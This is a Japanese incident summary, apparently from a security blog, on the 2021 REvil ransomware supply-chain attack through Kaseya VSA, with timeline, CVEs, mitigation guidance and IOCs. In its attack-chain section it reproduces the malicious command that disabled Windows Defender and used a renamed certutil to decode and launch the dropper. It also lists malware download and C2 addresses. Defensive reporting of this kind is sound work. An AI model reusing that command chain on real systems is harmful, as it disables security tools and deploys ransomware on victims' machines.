2021年7月2日、米フロリダ州のIT企業のKaseyaは同社のRMM(リモート監視・管理)製品である「Kaseya VSA」をオンプレミスで利用している顧客に対してサイバー攻撃が発生していると公表しました。同製品を運用する顧客の多くはMSP事業者で、MSPサービスを利用する多数の中小企業などに影響が及びました。ここでは関連する情報をまとめます。
1.最大1500組織にランサムウエアの影響か
- Kaseya VSAの未修正の脆弱性が悪用され、VSAのシステム管理対象の端末に対してランサムウエアに感染するPowerShellスクリプトが配られ実行された。
- Kaseya VSAはマネージドサービスプロバイダーに導入されるケースが多く、MSP事業者が攻撃を受けたことによりサービスを利用する多数の組織に被害が及んだ。一方で、Kaseyaが把握している当該事案のターゲットとなったMSP事業者数は50~60程度とされ、ランサムウエアによる影響を受けた組織も800~1500と推計されている。Kaseyaの顧客数は3万5000件超(大半はMSP事業者とされ、その管理対象の組織総計は約80万~100万)とされ、同社は被害に遭った実数から今回の攻撃による影響は限定的との見解を示している。また被害に遭った端末は最大で4万台程度とする報道も行われている。 *1
- 事案発生を受け、Kaseya VSAをオンプレミスで運用しているユーザー(主にMSP事業者)に対して即時にオフラインとすること、さらにSaaSとして提供されるサービスをシャットダウンを行っている。(Kaseya自社や同社が提供するSaaSへの影響は確認されていない。)またランサムウエアを通じた攻撃者からのメッセージを受け取った場合はリンクのクリックを行わないよう呼びかけを行った。
- Kaseyaは今回の事案を受け、FBI、CISA、ホワイトハウス、国土安全保障省などの政府組織との連携を行っている他、FireEye Mandiant IRチームに対して今回のインシデントを受け調査依頼を行っていると説明。また侵害検出用のツールを提供している。
100万台攻撃を主張する声明
- 使用されたランサムウエアやリークサイトへの投稿など、今回の事案はREvil (Sodinokibi)に帰属するランサムウエア事案とセキュリティベンダ*2などからみられている。
- REvilはKaseya VSAへの侵害を通じて100万台への影響を及ぼしたと主張し、被害に遭った全ての組織に対する復号ツールと引き換えにKaseyaに対して7000万ドル(約77億円)相当のBTCを要求したとリークサイト上に掲載。(SNS上では要求金額が5000万ドルに引き下げられたと報告するツイートもある。またMSP事業者向けには500万ドル、被害組織には44,999ドルの要求で対応するとした。)
- REvilは暗号化と窃取情報の暴露の二重脅迫の手口を行うことが知られるが、今回のKaseya VSAを標的にした一連の攻撃で情報窃取が発生したかについては明らかになっていない。またBleeping Computerはデータの窃取が発生していないことを示すチャットを公開している。*3
- Kaseyaは身代金要求に応じる用意があるかどうか取材を受けているが言及を避けている。*4 被害に遭った企業の内2社で身代金の支払いが行われたとBleeping Computerは取り上げている。*5
複数国で被害発生
Coop Boden håller dock öppet 💪🏼 men självscanningen ligger nere. pic.twitter.com/GBkME8x7cd
— Nicklas Andersson (@Investeraren) 2021年7月3日
- スウェーデンのスーパーマーケット CoOpが約800に及ぶ全国の店舗を土曜日に一時閉鎖したことが報じられている。同社は同じくスウェーデンのMSP Visma EssCom社が支払システムの管理を行っている。Visma社はKaseyaのユーザー。*6 *7
- ニュージーランドでは11の学校、複数の幼稚園が影響を受けたと報じられている。
- ESETはテレメトリより17か国に影響が及んだとし、とりわけ米国、英国、南アフリカ、カナダ、ドイツ、コロンビアからのレポートが多くを占めるとブログで明らかにしている。また、ESETのツイートには日本も含まれているが、7月10日時点で今回の事案に関連するとみられる被害公表はpiyokangoは確認していない。*8
- 7月4日にDIVDがスキャンを行ったところ、過去に2200件確認されたホストが140未満に減少。*9 DVIDは公開されたVSAのIPアドレスリスト、顧客IDのリストをKaseyaに提供している。
Based on #ESET’s telemetry, we have identified victims in the 🇬🇧UK, 🇿🇦South Africa, 🇨🇦Canada, 🇩🇪Germany, 🇺🇸USA, 🇨🇴Colombia, 🇸🇪Sweden, 🇰🇪Kenya, 🇦🇷Argentina, 🇲🇽Mexico, 🇳🇱the Netherlands, 🇮🇩Indonesia, 🇯🇵Japan, 🇲🇺Mauritius, 🇳🇿New Zealand, 🇪🇸Spain and 🇹🇷Turkey so far. 2/3 pic.twitter.com/CSzOai0uwq
— ESET research (@ESETresearch) 2021年7月4日
被害公表しているMSP事業者
- VelzArt
- HOPPENBROUWERS
- Visma EssCom
- Synnex
- Avtex
2.RMMの0day脆弱性を悪用
- Kaseya VSAへの攻撃には脆弱性 CVE-2021-30116 が悪用されたとみられている。悪用された7月2日時点では未修整で7月11日に修正パッチのリリースが公開された。認証バイパスの脆弱性とされるが悪用された脆弱性が他にないのかを含め、脆弱性関連の情報はKaseyaから直接の言及が7月10日時点で行われていないため不明である。(MSP事業者のIR対応を行っているセキュリティ企業より関連する情報が公開されている。)
- 今回の事案以前にオランダのDIVD(Dutch Institute for Vulnerability Disclosure) CSIRTがKaseyaVSAの脆弱性を7件確認しており、Kaseyaへは4月に報告が行われていた。今回悪用された脆弱性がその中で報告済みのCVE-2021-30116であると言及している。
- DIVDが報告した脆弱性は4月10日、5月8日に一部が修正されている。CVE-2021-30116は6月26日にSaaSに対してアップデートが行われている。DIVDが今回の事案を受けて脆弱性に関連する限定開示を行っており、7月7日時点で解決中とした脆弱性は3件となっている。
DIVDが報告した脆弱性
| CVE | 概要 | 対応状況(7月10日時点) |
|---|---|---|
| CVE-2021-30116 | 認証情報リークとビジネスロジックの欠陥 | 9.5.7a(7月11日パッチ)で修正済 |
| CVE-2021-30119 | クロスサイトスクリプティングの脆弱性 | 9.5.7a(7月11日パッチ)で修正済 |
| CVE-2021-30120 | 2要素認証のバイパス | 9.5.7a(7月11日パッチ)で修正済 |
| CVE-2021-30118 | リモートコード実行の脆弱性 | 9.5.5(4月10日パッチ)で修正済 |
| CVE-2021-30117 | SQLインジェクションの脆弱性 | 9.5.6(5月8日パッチ)で修正済 |
| CVE-2021-30121 | ローカルファイルインクルージョンの脆弱性 | 9.5.6(5月8日パッチ)で修正済 |
| CVE-2021-30201 | XML外部エンティティの脆弱性 | 9.5.6(5月8日パッチ)で修正済 |
3.侵害したVSAを通じ不正スクリプト拡散
攻撃者によって侵害されたKaseya VSAを通じて、次の流れで管理対象となる端末に対し攻撃が行われた。
- VSAからスクリプトが配信され実行
- PowerShellを通じてWindows Defenderを無効化
- CertUtilを使いドロッパーをデコードし生成
- ドロッパーから2つのファイルを生成
- 生成された正規のWindows Defenderを使ってランサムのDLLをサイドローディング
- ファイルを暗号化し脅迫文を作成
- Netshでファイアウォール設定を変更
(1) VSAからスクリプトを配信し実行
- 2021年7月2日11時頃 Kaseya VSAを通じて
Kaseya VSA Agent HotFixという名前のスクリプトが配信・実行された。また追加のプロシージャとしてArchiveand Purge Logsという名前のスクリプトも実行されるケースが確認されている。
スクリプトでは次の処理が実行される。
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n (ランダムな数字) > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
スクリプトではまずPINGを使ってタイマー的な動き(スリープ機能)を行っている。
- ローカルホストに対して指定された数字の回数だけ送信する。
- 1回あたり1秒となることから4桁の数字を指定することで数十分間、スクリプト実行後に実処理開始を遅らせることが出来る。
- VSA側で配信する際にランダムに数字を生成し、端末ごとに実行開始時間を変更している。
ここで行われている内容として、マルウエアが作成されるだけでなく、Windows Defenderの様々な機能の無効化が行われている。具体的には次のもの。
- リアルタイム保護の無効化
- 既知の脆弱性悪用に対する保護の無効化
- ダウンロードや添付されたファイルのスキャン無効化
- スクリプトスキャンの無効化
- 制御されたフォルダーアクセスの無効化
- ネットワーク保護を監査モード(悪性のIPアドレス、ドメインの非遮断)で動作
- クラウドによる保護の無効化
- 詳細分析必要時のファイルサンプル送信無効化
スクリプトは正規のcertutil.exe(cert.exeにランダムな文字列を追加したファイル名に変更)を使ってagent.crtをデコードし、Cドライブ直下にあるkworkingフォルダにagent.exeのファイル名で出力される。agent.exeは次の有効な証明書によるデジタル署名が行われている。コンパイル時間は実行直前日の2021年7月1日14時40分29秒。
Name: PB03 TRANSPORT LTD.
Email: Brouillettebusiness@outlook.com
CN = Sectigo RSA Code Signing, CAO = Sectigo Limited, L = Salford, S = Greater Manchester, C = GB
Serial #: 119acead668bad57a48b4f42f294f8f0
Issuer: https://sectigo.com/
kworkingはKaseya VSAの端末に既定でagent working directoryとして指定されているフォルダで、Kaseya Agentが適切に動作するためにウイルス対策ソフトの除外対象とすることが推奨されている。
(2) ドロッパーで2つのファイルを作成
agent.exeを実行すると2つのファイルを出力し、DLL Side loadingという手法を用いてWindows Defenderの実行ファイル(古いバージョン)をLOLBinとして使用し、ランサムウエア(mpsvc.dll)を起動する。
agent.exeから生成される2つのファイル
| MsMpEng.exe | Windows Defenderの正規の実行ファイル LOLBinとして使用 |
|---|---|
| mpsvc.dll | REvilの暗号化ソフトウェア (ランサムウエア) |
(3) 端末内を暗号化
確認されたランサムウエアについて、次の機能が確認されている。
- 特定の8のサービスの無効化と削除、29のプロセスの停止。*10
- 暗号化処理が実行される際、レジストリ
BlackLivesMatterが追加される。ここには攻撃の構成情報とみられるキーが格納される。 - netshコマンドを使ってローカルネットワーク上で接続できるようにファイアウォールの設定を変更する。
- 実行端末のOSに設定された言語を検出し、特定言語に該当する場合は実行プロセスを停止。
- 実行端末の壁紙の変更、および脅迫メッセージファイルの生成。(表示されるメッセージ)
停止対象のプロセスやサービス
| 停止対象サービス | veeam, memtas, sql, backup, vss, sophos, svc$, mepocs |
|---|---|
| 停止対象プロセス | encsvc, powerpnt, ocssd, steam, isqlplussvc, outlook, sql, ocomm, agntsvc, mspub, onenote, winword, thebat, excel, mydesktopqos, ocautoupds, thunderbird, synctime, infopath, mydesktopservice, firefox, oracle, sqbcoreservice, dbeng50, tbirdconfig, msaccess, visio, dbsnmp, wordpad, xfssvccon |
4.関連事象
(1) CISAのガイダンス
- 事案発生を受け、2021年7月4日に米CISA、FBIはMSPとその顧客向けに攻撃影響を緩和するためのガイダンスを公開し、これに従うよう強く要請した。
- ガイダンスではMSP事業者に対して4つ、その顧客に対して3つのアクションを推奨している。
| MSP事業者向け | ①KaseyaVSA検出ツールをダウンロードし、IOCがシステム上に存在するかを確認する。 ②単一アカウントに対して多要素認証を有効し、また顧客向けサービスに対しても多要素認証を有効にする。 ③通信許可リストを作成し、リモート監視・管理機能に対して既知のIPアドレスに制限する。 ④RMMの管理インターフェースをVPNまたは専用の管理ネットワーク上でFWよりも後ろに配置する。 |
|---|---|
| MSP利用顧客向け | ①バックアップを最新であることを確認し、エアギャップされ容易に取得可能な場所に保管されていることを確認する。 ②ベンダーの修正ガイダンスに従い、手動でのパッチ管理プロセスに戻し、修正パッチが利用可能になり次第インストールを行う。 ③多要素認証、主要なネットワーク管理アカウントに対する最小特権の原則に基づいた実装を行う。 |
(2) Kaseya VSAの修正通知を騙るメール
Kaseya VSAの脆弱性修正を行うとしてMicrosoftアップデートプログラムが公開したと騙り添付ファイルを実行させようとするメールが確認された。
- 添付されているのは実行ファイル(SecurituUpdates.exe)で、誤って実行するとCobaltStrikeに感染する。
- ESETによれば、特にバラマキの対象となっているのはスペイン、米国、カナダ、トルコ、英国
| Payload | 32fc03caa22bc3bbf778b04da675e528dd7125a61da6f9fc5e532230745bcd8c |
|---|---|
| ダウンロードURL | hxxp://45.153.241[.]113/download/pload.exe |
| C2 Server | 31.42.177[.]52 |
A #malspam campaign is taking advantage of Kaseya VSA #ransomware attack to drop #CobaltStrike.
— Malwarebytes Threat Intelligence (@MBThreatIntel) 2021年7月6日
It contains an attachment named "SecurityUpdates.exe" as well as a link pretending to be security update from Microsoft to patch Kaseya vulnerability! pic.twitter.com/0nIAOX786i
(3) Kaseyaのカスタマーサポートサイトに5年前の脆弱性
KrebsOnSecurityが7月3日にKaseyaに対してMandiantからカスタマーサポートサイトにCVE-2015-2862の脆弱性が存在していると指摘を受けていたと記事に取り上げた。
- カスタマーサポートサイトは
portal.kaseya.netで稼働していたもの。実は指摘を受けたポータルは2018年時点で廃止され、新しい基盤へ移行済みであった。何故古いサイトがオンライン状態となっていたかは不明。 - CVE-2015-2862はディレクトリトラバーサルの脆弱性で外部のユーザーがサーバー上のファイルを読み取りできるもの。
- 実際に7月3日午後までにサイト上のweb.configファイルを取得できる状態にあった。
- 今回のランサムウエア事案に対してこの脆弱性の問題が関係があるとする証拠は確認されていないとKaseyaは説明。
(4) ユニバーサル復号キーを入手
- 2021年7月21日、Kaseyaはランサムウエアにより暗号化されたファイルの復号を可能とするユニバーサル復号キーを入手したと公表した。
- Emisoftと協力して対応を進めており、同社により暗号化の復号が可能であることを確認している。
- Kaseyaがどのような方法によりこの復号キーを入手したのかは明らかにされていない。
5.関連情報
インディケーター情報
- 今回の事案に関連するインディケーター情報はPeterLowe氏がGithub上に保管しているリストがCISAのガイダンスより参照されている。但し、緊急性を要する事案であることから共有されたもので内容保障は行っていないとも記載されている。
- Kaseya が特定したとして、次のインディケーター情報を掲載している。
| VSAへの攻撃に用いられた接続元のIPアドレス | 35.226.94[.]113 161.35.239[.]148 162.253.124[.]162 |
|---|---|
| ランサムウエア展開に使用されたファイル | 正規ファイル (cert.exe) 939aae3cc456de8964cb182c75a5f8cc (agent.crt) 561cffbaba71a6e8cc1cdceda990ead4 (agent.exe) a47cf00aedf769d60d58bfe00c0b5421 (mpsvc.dll) |
| 攻撃者のHTTPリクエスト | POST /dl.asp curl/7.69.1 GET /done.asp curl/7.69.1 POST /cgi-bin/KUpload.dll curl/7.69.1 GET /done.asp curl/7.69.1 POST /cgi-bin/KUpload.dll curl/7.69.1 POST /userFilterTableRpt.asp curl/7.69.1 |
- セキュリティベンダなどが公開しているインディケーター情報は以下の通り。
| ファイル名 | ハッシュ値 |
|---|---|
| agent.crt | 2093c195b6c1fd6ab9e1110c13096c5fe130b75a84a27748007ae52d9e951643 |
| agent.exe | d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e |
| mpsvc.dll | 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20 d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402 8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f |
| レジストリ | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon -> DefaultPassword=DTrump4ever |
他インディケーターに関連する情報
MITRE ATT&CK
| Tactic | techniques |
|---|---|
| Initial Access | T1159.002 Supply Chain Compromise: Compromise Software Supply Chain |
| Execution | T1059.001 Command and Scripting Interpreter: PowerShell |
| Persistence | T1574.002 Hijack Execution Flow: DLL Side-Loading |
| Privilege Escalation | T1574.002 Hijack Execution Flow: DLL Side-Loading |
| Defense Evasion | T1036.003 Masquerading: Rename System Utilities T1562.001 Impair Defenses: Disable or Modify Tools T1140 Deobfuscate/Decode Files or Information T1574.002 Hijack Execution Flow: DLL Side-Loading T1070.004 Indicator Removal on Host: File Deletion T1112 Modify Registry T1553.002 Subvert Trust Controls: Code Signing |
| Impact | T1486 Data Encrypted for Impact |
関連タイムライン
| 日時 | 出来事 |
|---|---|
| 2021年4月上旬 | DIVD CSIRTが今回悪用された脆弱性を含む7件の情報をKaseyaへ報告。 |
| 2021年4月10日 | Kaseyaが報告を受けた脆弱性の内、1件を修正する修正パッチ(9.5.5)を公開。 |
| 2021年5月8日 | Kaseyaが報告を受けた脆弱性の内、2件を修正する修正パッチ(9.5.6)を公開。 |
| 2021年7月2日 | Kaseya が同社製品を通じたランサムウエア感染事案が発生していると公表。 |
| 同日 | CISAがKaseya VSAによるMSP事業者に対するサプライチェーン攻撃が発生しており、Kaseyaのアドバイザリに従うよう推奨。 |
| 2021年7月3日 | Kaseyaが侵害検出を可能とするツールを公開。 |
| 2021年7月4日 | CISA,FBIがKaseyaVSAによるサプライチェーン攻撃に対する攻撃緩和のためのガイダンスを公開。 |
| 2021年7月6日 | Kaseyaが攻撃の対処状況を報告。被害は限定的の見解を示す。 |
| 2021年7月9日 | Kaseyaを騙るスパムメールが発生しているとして注意を呼びかけ。 |
| 2021年7月11日 | 悪用された脆弱性の修正を含むKaseya VSAへの修正パッチ(9.5.7a)が公開。 |
| 2021年7月21日 | Kaseyaがユニバーサル復号キーを入手したと公表。 |
関連リンク
Kaseyaの公式発表
- Information Regarding Potential Attack on Kaseya VSA / Updates Regarding VSA Security Incident
- Kaseya Responds Swiftly to Sophisticated Cyberattack, Mitigating Global Disruption to Customers
- Incident Overview & Technical Details
セキュリティ組織等の分析記事
- 脅威に関する情報: Kaseya VSA ユーザーに対するランサムウェア攻撃(Paloalto UNIT42)
- Kaseyaプラットフォームを狙った新しいサプライチェーンランサムウェア攻撃(FORTINET)
- Kaseya VSA への REvil ランサムウェア攻撃を解説(deepinstinct)
- TTPs Used by REvil (Sodinokibi) Ransomware Gang in Kaseya MSP Supply-Chain Attack(PICUS)
- Independence Day: REvil uses supply chain exploit to attack hundreds of businesses(Sophos)
- Kaseya VSA Supply-Chain Ransomware Attack(Sophos)
- Security Update – Kaseya Supply-Chain Attack(Cynet)
- REvil Ransomware Attack on Kaseya VSA: What You Need to Know (VARONIS)
- Kaseya supply‑chain attack: What we know so far(ESET)
- CVE-2021-30116: Multiple Zero-Day Vulnerabilities in Kaseya VSA Exploited to Distribute REvil Ransomware (tenable)
- Resources for DFIR Professionals Responding to the REvil Ransomware Kaseya Supply Chain Attack (Cado)
- Kaseya supply chain attack targeting MSPs to deliver REvil ransomware (TRUESEC)
- Kaseya CEO: “The impact of this incredibly sophisticated attack is very minimal” (MalwareBytes)
- RAPID RESPONSE: MASS MSP RANSOMWARE INCIDENT (huntress)
更新履歴
- 2021年7月11日 PM 新規作成
- 2021年7月21日 AM 続報反映(復号キー入手)
*1:米IT企業にサイバー攻撃、世界中で最大4万台のPC感染も,THE WALL STREET JOUNAL,2021年7月5日
*2:ESETやCwordStrikeなど
*3:REvil is increasing ransoms for Kaseya ransomware attack victims,Bleeping Computer,2021年7月4日
*4:Up to 1,500 businesses affected by ransomware attack, U.S. firm's CEO says,Reuters,2021年7月6日
*5:REvil victims are refusing to pay after flawed Kaseya ransomware attack,Bleeping Computer,2021年7月8日
*6:Coop, other ransomware-hit firms, could take weeks to recover, say experts,Reuters,2021年7月6日
*7:Major Swedish Supermarket Chain Hit by Cyberattack,VOA,2021年7月3日
*8:インターネット上では古いバージョンの日本語のマニュアルも公開されている
*9:KASEYA CASE UPDATE 2,DIVD,2021年7月4日
*10:https://gist.github.com/fwosar/a63e1249bfccb8395b961d3d780c0354
